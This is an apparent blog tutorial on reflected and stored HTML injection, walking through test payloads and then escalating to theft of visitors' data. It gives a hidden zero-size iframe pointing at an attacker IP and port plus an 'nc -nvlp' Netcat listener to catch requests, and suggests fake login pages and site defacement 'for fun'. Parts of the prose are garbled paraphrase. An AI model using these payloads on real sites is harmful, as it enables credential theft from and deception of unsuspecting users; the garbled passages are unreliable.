HTML Injection tutorial

HTML Injection

In order to know what HTML injection is first, we need to know what is HTML..

HTML is Hyper Text Markup Language It is for the most part being utilized for making sites. Website pages and content are getting sent to a program as HTML reports. At that point, those HTML reports are being changed over into ordinary sites and showed for the last clients.

in this tutorial, we will learn how to do HTML injection practically.

What is HTML Injection?

The substance of this sort of injection attack is an injection of HTML code into the search field or any of the vulnerable pieces of the site. The Malicious client sends malicious HTML code through that any of the vulnerable fields such as URL with a reason to manipulate the web composition or any data, that is shown to the client.
we are going to see types of HTML injection and how to do it.

Types of HTML Injections

  • Reflected HTML Injection
  • Stored HTML Injection

 Reflected HTML Injection

Reflected Injection attack can be performed in accordance to the HTTP technique that are, GET method and POST method. as we know the working of these requests,
with POST  data is gets sent
with GET  data is gets requested.
By checking source code we can find which method can be used for that website.

Reflected HTML Injection (GET)

Reflected GET Injection occurs, when our input is being displayed (reflected) on the website. if we used HTML code on a vulnerable website then it will be displayed on that website at that instance and also HTML code is injected in that website's HTML document.

as you can see in the image below

Reflected get injection
Reflected get injection
as we typed HTML tag <h1>html injection</h1> login form its reflecting in the site which means this site is vulnerable to HTML injection.

to find its vulnerable or not just needed any HTML tag to display in it. 

Reflected HTML Injection (POST)

in Reflected GET Injection, It occurs when an attacker sends a malicious HTML code instead of valid POST method requests parameters.

it is quite difficult to escalate than GET because POST request sent by a site to the server that's why sometimes we need to tamper data ( firefox addon ) to craft and send POST request to the server. 

Reflected POST Injection
Reflected POST Injection

in this image above HTML code is shown in simple <h1>Hacking Castle</h1>  which displayed in there but its send to server by POST method because it's not the defined parameter. 
we will see how to use tamper data in the next type..

Reflected HTML Injection ( URL )

Reflected URL HTML Injection occurs when HTML code is getting sent by an attacker through the website URL displayed on the website and simultaneously injected to the website’s HTML document.

this time we will be using tamper data to craft URL and send it to server this URL will be shown to other persons visiting the same page. 

in order to do that open tamper data and change URL from there and send requests till they reach to server then stop it.

Editing url in tamper data
Editing URL in tamper data

Reflected url
Reflected URL

as you can see image above link URL is changed to request we crafted using tamper data.
this will be stored in page for other users too so we can escalate many malicious things to get user info
that we going to see in the next type of HTML injection.

Stored HTML Injection

stored injection attack occurs when a malicious HTML code is saved in the webserver and it will arbitrarily execute when victim tries use that function.

Stored HTML Injection

this page contains submit a form which stores the input of the user and list  it below but if it is not used parameter in it then it will be injected by HTML tag and vulnerable to HTML Injection

we will be going to use HTML tag

     <h1>Hacking Castle</h1>

  to see it's vulnerable or not.

vulnerable to stored HTML Injection
vulnerable to stored HTML Injection

as we can see this HTML tag stored in the page.

lets see another example this time we will use <script>alert("Hacking Castle");</script>
this javascript code will alert the page with popup.


in the image above we can see it popped up on-page and its also stored in the form it means whenever someone opens that page or refresh it this will pop up there. 

that's the difference between reflected and stored HTML Injection.

so this is about Stored HTML Injection now we are going to see how can we escalate further to steal user informations..

Stealing user Information using HTML Injection

here we are going to use iframe tag and Netcat listener to get useful information.
first, we will be using this iframe tag  

<iframe src="http://(IP:port)/test* height="0" width="0"></iframe>

before hitting submit open Netcat session using terminal and type command 

nc -nvlp (port)

it will open the listener then hit submit and we will get the user credential of anyone who opens that page..

getting user credentials using HTML Injection
getting user credentials using HTML Injection

more ideas to play with

  • HTML is a very good language to play with.  we can make HTML login page with Netcat listener to get users login credentials

  • We have hell lots of HTML code is to deface the site if its vulnerable 

These things I leave up for you guys play with it and have fun.

This cheat sheet will help you with that..
 Cheat sheet 


it is observable, that there are unquestionably less writing and data about HTML Injection. Along these lines, analyzers may choose not to play out this sort of testing. Nonetheless, for this situation, HTML attack chances possibly not assessed enough. 

As we have broken down in this instructional exercise, with this kind of Injection the entire plan of your site might be devastated or even the client's login information might be taken. In this way, it is strongly prescribed to incorporate HTML Injection into security testing and contribute great information.

that's all of it about HTML Injection....

Happy Hacking

You may like these posts